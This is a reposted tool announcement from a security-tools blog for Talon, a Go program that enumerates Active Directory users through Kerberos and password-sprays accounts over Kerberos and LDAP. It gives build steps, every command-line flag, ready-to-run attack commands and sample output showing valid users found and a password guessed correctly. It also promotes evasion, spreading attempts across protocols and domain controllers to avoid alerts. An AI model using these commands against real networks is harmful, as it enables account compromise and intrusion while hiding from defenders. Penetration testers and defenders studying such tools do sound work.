![]()
Talon - A Password Guessing Tool That Targets The Kerberos And LDAP Services Within The Windows Active Directory Environment
2020-11-29 20:30:00
Author: www.blogger.com(查看原文)
阅读量:195
收藏
tag:blogger.com,1999:blog-8317222231133660547.post-29828500375668393072020-11-29T08:30:00.007-03:002020-11-29T08:30:03.349-03:00Talon - A Password Guessing Tool That Targets The Kerberos And LDAP Services Within The Windows Active Directory Environment<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-lpy_5ucExJw/X8HRo_4CNeI/AAAAAAAAUfs/E8xrOzM_fVMbJplv6Tjx1QaZ5GSUdr-LQCNcBGAsYHQ/s707/Talon.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="591" data-original-width="707" height="535" src="https://1.bp.blogspot.com/-lpy_5ucExJw/X8HRo_4CNeI/AAAAAAAAUfs/E8xrOzM_fVMbJplv6Tjx1QaZ5GSUdr-LQCNcBGAsYHQ/w640-h535/Talon.png" width="640" /></a></div><p><br /></p><p>Talon is a tool designed to perform <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="automated">automated</a> password guessing attacks while remaining undetected. Talon can enumerate a list of users to identify which users are valid, using Kerberos. Talon can also perform a password guessing attack against the Kerberos and LDAPS (LDAP Secure) services. Talon can either use a single domain controller or multiple ones to perform these attacks, randomizing each attempt, between the domain controllers and services (LDAP or Kerberos).</p><span><a name='more'></a></span><p><br /></p><p>More info about the techniques can be found on the following <a href="https://www.optiv.com/explore-optiv-insights/blog/digging-your-talons-new-take-password-guessing" rel="nofollow" target="_blank" title="Blog">Blog</a></p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <p>Download release for your OS from <a href="https://github.com/optiv/Talon/releases" rel="nofollow" target="_blank" title="releases">releases</a></p> <br /><span style="font-size: large;"><b>Contributing</b></span><br /> <p>Talon was developed in golang.</p> <p>The first step as always is to clone the repo. Before you compile Talon you'll need to install the dependencies. To install them, run following commands:</p> <pre><code>go get github.com/fatih/color<br />go get gopkg.in/jcmturner/gokrb5.v7/client<br />go get gopkg.in/jcmturner/gokrb5.v7/config<br />go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID<br />go get gopkg.in/ldap.v2<br /></code></pre> <p>Then build it</p> <pre><code>go build Talon.go<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code>$ ./Talon -h<br />Usage of ./Talon:<br /> -D string<br /> Fully qualified domain to use<br /> -E Enumerates which users are valid<br /> -H string<br /> Domain controller to connect to<br /> -Hostfile string<br /> File containing the list of domain controllers to connect to<br /> -K Test against Kerberos only<br /> -L Test against LDAP only<br /> -O string<br /> File to append the results to<br /> -P string<br /> Password to use<br /> -U string<br /> Username to authenticate as<br /> -Userfile string<br /> File containing the list of usernames<br /> -debug<br /> Print debug statements<br /> -sleep float<br /> Time inbetween attempts (default 0.5)<br /></code></pre> <br /><span style="font-size: large;"><b>Enumeration Mode</b></span><br /> <p>User <a href="https://www.kitploit.com/search/label/Enumeration" target="_blank" title="enumeration">enumeration</a> mode can be executed with the <code>-E</code> flag which will send only Kerberos TGT pre-authentication request to the target KDC, however, this request is sent with a known bad or no longer supported <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> type. Talon reviews the response by the KDC to determine if responds with a <code>KDC_ERR_ETYPE_NOSUPP</code>, which indicates if a user exists or <code>KDC_ERR_C_PRINCIPAL_UNKNOWN</code> if it does not. Talon can perform this type of enumeration against multiple domain controllers in an enterprise using the <code>-Hostfile</code> command to specify multiple domain controllers, or a single domain controller using <code>-H</code>. Using this technique will not cause any login failures so it will not lock out any of the users.</p> <pre><code>./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E <br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /><br />[-] 172.16.144.195 STARLABS.LOCAL\asmith: = User Does Not Exist<br />[+] 172.16.144.185 STARLABS.LOCAL\ballen: = User Exist<br />[-] 172.16.144.186 STARLABS.LOCAL\bjohnson: = User Does Not Exist<br />[-] 172.16.144.195 STARLABS.LOCAL\bwayne: = User Does Not Exist<br />[+] 172.16.144.195 STARLABS.LOCAL\csnow: = User Exist<br />[-] 172.16.144.186 STARLABS.LOCAL\jtodd: = User Does Not Exist<br />[+] 172.16.144.186 STARLABS.LOCAL\hwells: = User Exist<br />[-] 172.16.144.186 STARLABS.LOCAL\wwest: = User's Account Locked<br /></code></pre> <br /><span style="font-size: large;"><b>Automated Password Guessing Mode</b></span><br /> <p>Talon utilize Kerberos and LDAP, which are both integrated into <a href="https://www.kitploit.com/search/label/Active%20Directory" target="_blank" title="Active Directory">Active Directory</a> for authentication. Talon can perform password guessing by alternating between the two services, allowing the password attack <a href="https://www.kitploit.com/search/label/Traffic" target="_blank" title="traffic">traffic</a> to be split across two protocols. This splits the number of potential events generated, as a result reducing the chance of an alert. Talon takes this one step further, by distributing a password attack against multiple domain controllers in an enterprise using the <code>-Hostfile</code>, alternating between LDAP and Kerberos each time to create an additional layer of obscurity. A single domain controller can be provided using in the <code>-H</code> command if needed.</p> <pre><code>./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1<br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /> <br />[-] 172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed<br />[-] 172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed<br />[-] 172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed<br />[+] 172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success<br />[-] 172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed<br /></code></pre> <p>Talon is designed to be versitale given any siutaiton as a result, if only Kerberose is available, Talon can be set to only attack against Kerberos using the <code>-K</code> flag or only LDAP using the <code>-L</code> flag.</p> <p>Talon can use both Kerberos and LDAP to read the responses as we perform a password guessing attack. Talon can detect account lockouts during an active password guessing attack by reading the response code from each password attempt. This can help prevent any unwanted account locks acorss a enterprise, helping you to remain undetected. Simply follow the prompt to quit or continue the attack.</p> <pre><code>root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2<br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /><br />[-] 172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed<br />[-] 172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed<br />[-] 172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked<br />[*] Account lock out detected - Do you want to continue.[y/n]:<br /></code></pre> <br /><b>Troubleshooting</b><br /> <p>Talon comes equip to detect if the targeted domain controllers are activy or become unavialble. This helps ensure your getting accurate results while not wasting time.</p> <pre><code>root@kali:~# ./Talon -H 172.14.15.1 -Userfile ValidUsers -D STARLABS.local -P "Frosty20" -sleep 2<br /><br /> __________ ________ ___ ________ ________<br /> |\___ _\\\ __ \|\ \ |\ __ \|\ ___ \<br /> \|___ \ \_\ \ \|\ \ \ \ \ \ \|\ \ \ \\ \ \<br /> \ \ \ \ \ __ \ \ \ \ \ \\\ \ \ \\ \ \<br /> \ \ \ \ \ \ \ \ \ \____\ \ \\\ \ \ \\ \ \<br /> \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\<br /> \|__| \|__|\|__|\|_______|\|_______|\|__| \|__|<br /> (@Tyl0us)<br /><br /><br />[Root cause: Networking_Error] Networking_Error: AS Exchange Error: failed sending AS_REQ to KDC: failed to communicate with KDC 172.14.15.1<br />[*] Do you want to continue.[y/n]:<br /></code></pre> <br /><b>Changelog</b><br /> <ul> <li>Published on 04/09/2018</li> <li>Version 1.2 released 02/14/2019</li> <li>Version 1.3 released 05/03/2019</li> <li>Version 1.4 released 03/17/2020</li> <li>Version 2.0 public relase 06/18/2020</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/optiv/Talon" rel="nofollow" target="_blank" title="Download Talon">Download Talon</a></span></b></div>Zion3R[email protected]
文章来源: http://www.blogger.com/feeds/8317222231133660547/posts/default/2982850037566839307
如有侵权请联系:admin#unsafe.sh